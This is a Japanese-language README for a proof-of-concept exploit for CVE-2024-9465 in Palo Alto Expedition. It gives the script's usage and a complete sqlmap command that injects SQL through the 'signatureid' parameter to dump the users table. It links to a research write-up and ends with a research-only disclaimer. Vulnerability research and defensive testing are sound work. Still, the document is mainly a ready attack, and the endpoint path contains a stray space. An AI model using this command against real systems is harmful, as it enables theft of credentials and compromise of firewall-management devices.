
CVE-2024-9465 の概念実証エクスプロイト
脆弱性のあるデバイス上でCVE-2024-9465を悪用するための概念実証。
根本原因と侵害指標はこちら: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
% python3 CVE-2024-9465.py -h
usage: CVE-2024-9465.py [-h] -u URL
options:
-h, --help show this help message and exit
-u URL, --url URL The URL of the target
python3 sqlmap.py -u "https://<ip_address>/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=im port&type=test&project=pandbRBAC&signatureid=1" -p signatureid -T users --dump
このソフトウェアは、学術研究および効果的な防御技術の開発を目的として作成されたものであり、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクト管理者は、ソフトウェアの誤用について一切の責任を負いません。責任を持って使用してください。